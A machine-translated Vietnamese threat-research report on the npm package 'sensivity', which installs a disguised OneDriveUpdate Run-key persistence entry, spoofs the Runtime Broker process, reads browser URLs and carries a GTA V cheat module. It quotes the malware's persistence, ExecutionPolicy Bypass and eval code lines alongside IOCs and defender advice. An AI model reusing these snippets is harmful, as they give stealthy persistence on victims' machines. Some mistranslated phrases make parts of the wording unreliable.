TL; DR
Gói npm độ nhạy cảm Phần mềm này tự mô tả mình là "Bảng điều khiển độ nhạy". Trên hệ điều hành Windows, nó hoạt động như một công cụ điều khiển từ xa và giám sát.
Điểm vào của nó, launcher.js, đổi tên tiến trình của chính nó thành Runtime Broker, ghi giá trị khóa Run tự khởi động có tên OneDriveUpdate Việc này khởi chạy lại gói thông qua một tập lệnh VBScript ẩn, tạo ra PowerShell với -ExecutionPolicy Bypassvà sau đó đánh giá một gói dữ liệu máy chủ được mã hóa có dung lượng 171 KB cùng với một mô-đun gốc có dung lượng 6.87 MB. sens.node.
Nó đóng vai trò là bảng điều khiển ghép nối điện thoại trên cổng TCP 3000 và đọc URL trên thanh địa chỉ của trình duyệt đang hoạt động thông qua Windows UIAutomation, theo dõi một video YouTube được mã hóa sẵn.
Hai phần trước đây được coi là những hộp đen nay đã được giải quyết. Máy chủ bị che giấu thông tin, server.obf.jsNó sử dụng lược đồ mảng chuỗi RC4 của obfuscator.io; việc triển khai lại bộ giải mã của nó ngoại tuyến (không thực thi JavaScript) sẽ khôi phục một điểm cuối bên ngoài duy nhất — https://izopi.com/check.php — cùng với khóa công khai RSA được nhúng dùng để xác minh các phản hồi giấy phép đã ký.
Mô-đun gốc, sens.nodeNó không được đóng gói: bảng nhập khẩu và các chuỗi nhúng của nó xác định nó là một lớp phủ trong trò chơi DirectX 11 / Dear ImGui cung cấp các tính năng aimbot, ESP (wall-hack) và triggerbot, được điều khiển bởi việc tiêm tiến trình từ xa và đọc/ghi bộ nhớ.
Các chuỗi ký tự bên trong tham chiếu đến các thực thể phương tiện và vị trí trên bản đồ phù hợp với GTA V / FiveM. Gói npm là trình bao bọc phân phối và lưu trữ xung quanh mô-đun gốc đó.
Dấu hiệu quan trọng nằm ở khía cạnh vận hành, chứ không phải kỹ thuật: một nhà phát hành ẩn danh duy nhất đã tung ra khoảng bảy mươi phiên bản của cùng một gói phần mềm — 2.5.0 qua 2.5.69 — trong vài ngày, mỗi người đều mang cùng một loại súng phóng lựu.
Không có bước cài đặt nào. hooksPhần mã độc chỉ được thực thi khi gói phần mềm được khởi chạy.
Cuộc tấn công: Cơ chế hoạt động
Gói sensivity bao gồm mười tập tin. Tệp package.json rất đơn giản: không có trường repository, không có license, một bí danh main và hai bí danh bin (sensivity, sens) đều trỏ đến launcher.js, và một tập lệnh khởi động là node launcher.js. Không có postinstall hoặc preinstall. Không có gì được thực thi khi chạy npm install. Hành vi được mô tả bên dưới sẽ chạy khi người dùng khởi động gói — thông qua bin shim, tập lệnh khởi động hoặc require.
Tệp nén tarball chứa trình khởi chạy, một máy chủ được mã hóa, một mô-đun gốc, một kịch bản Visual Basic và thư mục web public/ cho bảng điều khiển. launcher.js là trình điều phối dễ đọc; logic quan trọng trong quá trình chạy nằm trong hai khối dữ liệu mà nó tải — một máy chủ được mã hóa và một mô-đun gốc đã biên dịch, cả hai đều được giải mã bên dưới.
Giả mạo quy trình và trình cập nhật OneDrive giả mạo
Ngay từ đầu quá trình thực thi, launcher.js đã thiết lập tên tiến trình của chính nó hai lần:
javascript process.title = 'Runtime Broker'; Runtime Broker là một tiến trình hợp pháp của Windows (RuntimeBroker.exe) có chức năng trung gian phân quyền ứng dụng. Việc đổi tên một tiến trình Node để trùng khớp với nó có nghĩa là khi nhìn nhanh vào Trình quản lý tác vụ sẽ không thấy điều gì bất thường.
Việc lưu trữ dữ liệu được thực hiện thông qua PowerShell chứ không phải bằng API đăng ký trực tiếp:
javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); Giá trị tự khởi động được đặt tên là OneDriveUpdate, và nó không trỏ trực tiếp đến gói phần mềm. Nó trỏ đến wscript.exe chạy tập lệnh OneDrive.Standalone.Updater.vbs được đóng gói sẵn. Tập lệnh đó khởi chạy lại node launcher.js trong một cửa sổ ẩn. Cả tên khóa Run và tên tập lệnh VBScript đều sử dụng thương hiệu của Microsoft, vì vậy mục tự khởi động được hiểu là một tác vụ OneDrive thông thường.
PowerShell với khả năng bỏ qua chính sách thực thi
Trình khởi chạy liên tục gọi PowerShell. Điểm yếu mà các trình quét đánh dấu là nghiêm trọng là việc khởi chạy một tập tin .ps1 được tạo ra với chính sách thực thi bị vô hiệu hóa:
javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); ExecutionPolicy Bypass loại bỏ việc kiểm tra chữ ký tập lệnh cục bộ cho lần gọi đó. Các tập lệnh được tạo ra sẽ xử lý công việc giám sát trình duyệt và phát hiện cửa sổ được mô tả trong phần tiếp theo.
Máy chủ bị làm mờ và mô-đun gốc
Sau khi thiết lập xong, launcher.js sẽ tải và thực thi phần mềm độc hại của nó:
const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8')); server.obf.js có dung lượng 171 KB, là mã làm mờ _0x-array — một kiểu mã JavaScript trong đó mọi chuỗi và định danh được thay thế bằng một chỉ mục trong một mảng đã được xáo trộn, sau đó được giải tham chiếu trong quá trình chạy. Phương pháp này là biến thể RC4 do obfuscator.io tạo ra: một hàm giải mã duy nhất giải mã base64 một mục trong mảng và sau đó giải mã RC4 nó bằng một khóa riêng cho mỗi lần gọi. Việc triển khai lại hàm giải mã đó trong một tập lệnh riêng biệt — chỉ chạy việc triển khai lại trên mảng chuỗi 821 mục đã được trích xuất, chứ không phải JavaScript của chính gói đó — sẽ giải mã nó một cách sạch sẽ. Những gì được hiển thị khá khiêm tốn nhưng...cisĐầu vào bao gồm: một URL bên ngoài, `https://izopi.com/check.php`, được gán cho hằng số `LICENSE_URL`; một khóa công khai RSA `PUBLIC_KEY_PEM` được nhúng; các tuyến bảng điều khiển cục bộ `/api/kill`, `/api/qr.png`, `/api/trigger`, `/api/url`, `/trigger/off` và `/trigger/status`; và các chuỗi `child_process`, `crypto` và `[Sensivity] sens.node` được tải — chuỗi cuối cùng chính xác là dòng nhật ký mà trình khởi chạy viết lại thành "program module loaded". Điểm cuối là kiểm tra giấy phép: máy khách gửi một mã định danh (máy chủ được mã hóa định dạng chuỗi ID Discord: %s) và khóa RSA xác minh phản hồi đã ký của máy chủ.
sens.node là một addon gốc được biên dịch với dung lượng 6.87 MB và không được đóng gói — phần entropy nằm ở 5.6–6.6 và các bảng nhập và xuất PE vẫn còn nguyên vẹn, do đó các chức năng của nó có thể được đọc trực tiếp. Nó xuất khẩu napi_register_module_v1, standard Điểm truy cập Node N-API, vì vậy máy chủ được đánh giá sẽ tải nó bằng lệnh require thông thường. Bảng nhập khẩu của nó chính là dấu hiệu nhận biết. Từ KERNEL32, nó lấy OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules và Process32First/NextW — tập hợp chuẩn để định vị một tiến trình khác, cấp phát bộ nhớ bên trong nó và đọc hoặc ghi vào bộ nhớ đó. Từ USER32, nó lấy GetAsyncKeyState, GetKeyState, mouse_event và SetCursorPos; nó liên kết d3d11.dll, D3DCOMPILER_43 và dwmapi cho lớp phủ trên màn hình, và toàn bộ tập hợp WINHTTP cho các cuộc gọi mạng. Các chuỗi ký tự nhúng đặt tên cho bộ tính năng một cách rõ ràng: Enable Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected, và biểu ngữ Dear ImGui Dear ImGui 1.91.3 WIP. Các chuỗi ký tự về vị trí và thực thể như Grapeseed Medical Clinic và từ vựng ESP phương tiện đều nhất quán với GTA V / FiveM.
Việc phân tách này có chủ đích: tệp launcher.js dễ đọc chỉ chứa những phần mà trình quét có thể dễ dàng đọc được — tính năng duy trì kết nối, ngụy trang, chính lệnh gọi eval — trong khi việc làm mờ mã nguồn che giấu máy chủ bên ngoài duy nhất mà môi trường runtime liên hệ, và tệp nhị phân chứa logic lớp phủ trò chơi và logic tiêm tiến trình. Trình khởi chạy là lớp vỏ mỏng, có thể kiểm toán; máy chủ được làm mờ mã nguồn che giấu danh tính mạng; mô-đun gốc là tải trọng. Chúng tôi mô tả các lệnh nhập và chuỗi của tệp nhị phân là đã đọc; chúng tôi không suy luận mục đích của người vận hành từ chúng.
Bảng điều khiển ghép nối điện thoại trên cổng 3000
Trình khởi chạy quản lý một máy chủ web cục bộ trên cổng TCP 3000 và coi nó như một thực thể duy nhất. Nó truy vấn xem có trình lắng nghe nào hiện có hay không và xóa trình lắng nghe đó trước khi liên kết:
javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); Bảng điều khiển có thể truy cập được tại http://localhost:3000, với URL dự phòng mạng LAN được mã hóa cứng là http://192.168.1.16:3000. Thư mục public/ và hoạt động của bảng điều khiển phù hợp với quy trình ghép nối mã QR: điện thoại quét mã và kết nối với máy chủ như một thiết bị từ xa. Không có tên miền điều khiển và quản trị bên ngoài nào xuất hiện dưới dạng văn bản rõ ràng trong trình khởi chạy — nhưng, như quá trình giải mã ở trên cho thấy, một tên miền như vậy có mặt trong máy chủ đã được mã hóa: điểm cuối cấp phép izopi.com. Bản thân bảng điều khiển là cục bộ và có phạm vi mạng LAN; máy chủ duy nhất kết nối ra bên ngoài là máy chủ kiểm tra giấy phép đó.
Mô hình giám sát/công nhân tách rời giúp duy trì hoạt động của tiến trình. Trình khởi chạy tự khởi tạo lại với các cờ môi trường SENSIVITY_SUPERVISOR và SENSIVITY_WORKER, mỗi tiến trình con chạy ẩn, vì vậy việc tắt một tiến trình sẽ để lại một tiến trình giám sát để khởi động lại nó.
Giám sát trình duyệt và tín hiệu YouTube
Hành vi cụ thể nhất là giám sát trình duyệt. launcher.js xây dựng PowerShell để điều khiển Windows UIAutomation đọc thanh địa chỉ của trình duyệt đang chạy:
javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', ValuePattern trả về nội dung văn bản của một phần tử giao diện người dùng. Khi được áp dụng cho điều khiển chỉnh sửa thanh địa chỉ của trình duyệt, nó trả về URL mà nạn nhân hiện đang xem — mà không cần tiện ích mở rộng trình duyệt, không cần truy cập vào hồ sơ trên ổ đĩa và không cần hook API. Đoạn mã được tạo ra sẽ lặp lại danh sách $browserNames và trích xuất URL hoặc tiêu đề cửa sổ của bất kỳ trình duyệt nào đang được sử dụng làm nền trước.
URL đó được kiểm tra so với một mục tiêu được mã hóa cứng duy nhất:
javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; Chương trình khởi chạy liên tục kiểm tra cửa sổ trình duyệt hiển thị YouTube trong vòng lặp ba giây, và mã PowerShell được tạo ra chứa cặp lệnh Get-YouTubeBrowser / Test-TargetYouTubeUrl khớp với ID video đó. Hiệu ứng quan sát được là hai mặt: URL trình duyệt đang hoạt động được đọc từ màn hình của nạn nhân, và sự tương tác của máy chủ với một video YouTube cụ thể được phát hiện. Chúng tôi mô tả cơ chế và mục tiêu; chúng tôi không suy luận động cơ từ đó.
Việc đọc thanh địa chỉ là thứ mà trình quét gắn nhãn là sensitive_data_enumeration — một nguồn Process::env và UIAutomation cung cấp dữ liệu cho một runtime có khả năng kết nối mạng. Thoạt nhìn, nó có vẻ vô hại và chỉ trở thành hoạt động giám sát khi vòng đời dữ liệu được theo dõi từ nguồn UIAutomation đến máy chủ được mã hóa.
Dòng thời gian và sự phát triển phiên bản
Việc cập nhật độ nhạy không chỉ diễn ra một lần. Tài khoản nhà xuất bản có khoảng bảy mươi phiên bản đã được xuất bản của gói phần mềm này, và các phiên bản mới vẫn tiếp tục được bổ sung trong suốt thời gian xem xét. Trình khởi chạy được bổ sung thêm nhiều tính năng trong dòng 2.5.x trong khi khả năng lưu trữ dữ liệu và tải trọng vẫn được giữ nguyên.
| Ngày (UTC) | Các phiên bản được quan sát | Trạng thái trình khởi chạy |
|---|---|---|
| 2026-06-02 | 2.5.8 – 2.5.46 (25) | Trình khởi chạy bảng QR cơ bản; Duy trì khóa chạy; Đánh giá máy chủ được mã hóa. |
| 2026-06-03 | 2.5.53 – 2.5.61 (6) | Cùng một dấu vân tay; ngăn chặn việc theo dõi trên bảng điều khiển. |
| 2026-06-04 | 2.5.67, 2.5.68 (2) | Thêm mục tiêu tương tác YouTube được ghim wJWta2lO0Lw. |
| 2026-06-05 | 2.5.0 – 2.5.69 (24) | Tái bản bổ sung nội dung còn thiếu trên toàn bộ phạm vi; người giám sát/người lao động giám sát công việc. |
Việc xem xét trình khởi chạy trên các phiên bản đã tải xuống — 2.5.0, 2.5.36 và 2.5.69 — cho thấy bốn cấp độ. Các bản dựng sớm nhất mang theo trình khởi chạy ghép nối QR cơ bản. Từ phiên bản 2.5.33, trình thu thập thanh địa chỉ UIAutomation xuất hiện. Từ phiên bản 2.5.58, một lớp quản lý giám sát được thêm vào. Từ phiên bản 2.5.64, trình giám sát/làm việc tách rời hoàn thiện bộ chức năng. Xuyên suốt, bốn điều không bao giờ thay đổi: khóa OneDriveUpdate Run, trình thả OneDrive.Standalone.Updater.vbs, tệp eval'd server.obf.js và mô-đun gốc sens.node.
Đợt cập nhật ngày 05/06/2026 đáng chú ý vì nó tái phát hành các phiên bản có số hiệu thấp hơn — từ 2.5.0 đến 2.5.15 — nằm dưới các phiên bản đã được xác nhận vài ngày trước đó. Kết quả là một dòng liên tục có tên 2.5.x trên registry, mỗi phiên bản đều sử dụng cùng một trình khởi chạy.
Các chỉ số thỏa hiệp
Tất cả các chỉ báo bên dưới đều được đọc trực tiếp từ gói nén tarball. Trình khởi chạy có thể đọc được chỉ chứa địa chỉ loopback và một địa chỉ mạng LAN riêng; tên máy chủ bên ngoài duy nhất, izopi.com, được khôi phục bằng cách giải mã server.obf.js khi ngoại tuyến.
| Kiểu | chỉ số | Ghi Chú |
|---|---|---|
| Bưu kiện | npm:sensivity (Khoảng 70 phiên bản, 2.5.0–2.5.69) | Trình phát hành dạng gói đơn; không có kho lưu trữ; không có giấy phép. |
| Tập tin | launcher.js | Bộ điều phối dễ đọc; mục tiêu chính và mục tiêu nhị phân. |
| Tập tin | server.obf.js (Khoảng 171 KB) | Payload chuỗi RC4 của obfuscator.io, được tải qua eval(fs.readFileSync(...)). |
| Tập tin | sens.node (Khoảng 6.87 MB) | Tiện ích bổ sung PE32+ x86-64 Node N-API; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40. |
| Tập tin | OneDrive.Standalone.Updater.vbs | Trình khởi chạy lại ẩn (node launcher.js). |
| mạng | https://izopi.com/check.php | Điểm cuối cấp phép/xác thực được khôi phục từ máy chủ đã được mã hóa; khóa công khai RSA được nhúng xác minh các phản hồi. |
| Khả Năng | OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread | Khả năng tiêm tiến trình từ xa và đọc/ghi bộ nhớ. |
| Khả Năng | Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP | Giao diện game DirectX 11 / ImGui tích hợp các tính năng aimbot, ESP và triggerbot. |
| Đăng ký | HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate | Giá trị khởi động tự động trỏ tới wscript.exe và trình khởi chạy VBScript. |
| Quy trình | process.title = 'Runtime Broker' | Giả mạo tiến trình Windows Runtime Broker hợp pháp. |
| Hành vi | powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 | Phương pháp bỏ qua chính sách thực thi được sử dụng cho các tập lệnh PowerShell được tạo tự động. |
| Hành vi | UIAutomation ValuePattern đọc thanh địa chỉ trình duyệt | Đọc URL của cửa sổ trình duyệt đang hiển thị ở phía trước. |
| Hành vi | ID video mục tiêu wJWta2lO0LwKhảo sát nhanh trên YouTube trong 3 giây | Tín hiệu giám sát tương tác được ghim. |
| mạng | http://localhost:3000dự phòng http://192.168.1.16:3000 | Bảng điều khiển ghép nối mã QR được hiển thị cục bộ và trên mạng LAN. |
| Môi trường | SENSIVITY_SUPERVISOR, SENSIVITY_WORKER | Các cờ phối hợp quy trình giám sát tách rời. |
Sự quy kết, tác động và những người bảo vệ
Gói phần mềm này được phát hành bởi một tài khoản npm duy nhất, có địa chỉ email được nêu là địa chỉ Gmail chưa được xác minh. Tài khoản này có điểm uy tín trên registry rất thấp, chỉ duy trì và phát hành duy nhất gói phần mềm này, và không có kho lưu trữ mã nguồn liên kết nào. Chúng tôi chưa xác minh được quyền sở hữu email và cho rằng chiến dịch này do tài khoản phát hành thực hiện, chứ không phải do bất kỳ cá nhân nào được nêu tên. Trình khởi chạy không có cơ sở hạ tầng dạng văn bản rõ ràng, nhưng máy chủ bên ngoài duy nhất hiện đã được biết: máy chủ được mã hóa liên hệ với izopi.com để kiểm tra giấy phép, và mô-đun gốc — được đọc từ bảng nhập khẩu và chuỗi chứ không phải đọc từng lệnh một theo chiều ngược lại — là một lớp phủ trò chơi được chèn vào và đọc bộ nhớ của một tiến trình khác.
Tác động dễ nhận thấy nhất là đối với người dùng Windows, những người cài đặt và chạy Sensivity với kỳ vọng về một tiện ích bảng điều khiển. Trên các máy chủ đó, gói phần mềm thiết lập khả năng tự khởi động liên tục được ngụy trang dưới dạng một tác vụ OneDrive, tự đổi tên để bắt chước một tiến trình hệ thống, đọc URL của bất kỳ thứ gì người dùng đang duyệt và thiết lập một bảng ghép nối liên kết máy tính với máy từ xa qua mạng cục bộ. Cơ chế giám sát/làm việc đảm bảo rằng việc tắt một tiến trình duy nhất không loại bỏ được nó; mục nhập khóa Run vẫn tồn tại sau khi khởi động lại. macOS và Linux không phải là mục tiêu của trình khởi chạy này — các đường dẫn về khả năng duy trì, PowerShell và UIAutomation chỉ dành cho Windows.
Việc liên tục phát hành tới bảy mươi phiên bản khác nhau là xu hướng đáng chú ý. Việc tái phát hành một gói phần mềm hàng chục lần trong vài ngày, bao gồm cả việc bổ sung các số phiên bản thấp hơn những phiên bản đã bị gỡ bỏ, giúp duy trì một bản sao hoạt động trên registry giữa các lần gỡ bỏ và làm vô hiệu hóa các danh sách chặn được ghim theo phiên bản. Một mục trong danh sách chặn cho sensivity@2.5.61 không có tác dụng gì đối với sensivity@2.5.3 được tái phát hành vào ngày hôm sau.
Người phòng thủ có thể thực hiện các hành động sau:
- Chặn hoàn toàn tính nhạy cảm của tên gói trong registry-proxy và danh sách cho phép của CI. Việc ghim các phiên bản riêng lẻ sẽ không hiệu quả bằng việc cập nhật lại định kỳ; tên gói mới là chỉ báo bền vững.
- Hãy tìm giá trị Run có tên OneDriveUpdate mà dữ liệu của nó gọi wscript.exe đối với tệp .vbs trong đường dẫn dành riêng cho người dùng. Trình cập nhật OneDrive chính hãng không được đăng ký theo cách này.
- Cảnh báo về một tiến trình Node.js có tiêu đề tiến trình là Runtime Broker. Thực tế, broker là RuntimeBroker.exe, chứ không phải là runtime của Node.js.
- Đánh dấu các lần tải xuống npm khi cài đặt các gói có chứa một tiện ích bổ sung .node đã biên dịch cùng với một lệnh eval(fs.readFileSync(…)) của một tệp .obf.js liền kề. Sự kết hợp đó — tệp nhị phân gốc không rõ ràng được tải bên cạnh một tải trọng văn bản bị làm mờ — là dấu hiệu cấu trúc ở đây, độc lập với bất kỳ IOC chuỗi nào.
- Hãy coi bất kỳ trình lắng nghe nào được liên kết cục bộ trên cổng 3000 do một tiến trình Node không mong muốn tạo ra là đáng ngờ trên các điểm cuối Windows được quản lý.
- Chặn hoặc cảnh báo các yêu cầu gửi đi đến izopi.com từ máy chủ của nhà phát triển hoặc người dùng cuối; đây là điểm cuối bên ngoài duy nhất của gói, có thể truy cập tại /check.php từ máy chủ đã được mã hóa.
- Đối với bất kỳ tiện ích bổ sung .node nào được đóng gói kèm theo, hãy kiểm tra bảng nhập khẩu của nó trước khi tin tưởng. Sự kết hợp giữa OpenProcess + VirtualAllocEx + WriteProcessMemory + CreateRemoteThread là một kiểu tấn công chèn tiến trình từ xa bất kể gói đó tuyên bố làm gì; ở đây nó nằm cạnh lớp phủ Direct3D và các chuỗi aimbot/ESP/triggerbot.
Đối với phân tích tĩnh pipelineNhư vậy, hình dạng của sự tin tưởng vẫn bền vững qua các phiên bản khác nhau: cấu hình cài đặt không qua mạng, gán tiêu đề quy trình cho tên quy trình hệ thống đã biết, ghi khóa Run thông qua PowerShell và đánh giá tệp được đọc từ đĩa. Không có điều nào trong số đó phụ thuộc vào tên miền, địa chỉ IP hoặc số phiên bản mà lần phát hành lại tiếp theo có thể loại bỏ.
dự án
[npm: độ nhạy] – Trang đăng ký cho dòng phiên bản gói được thảo luận ở đây; có thể bị gỡ xuống.





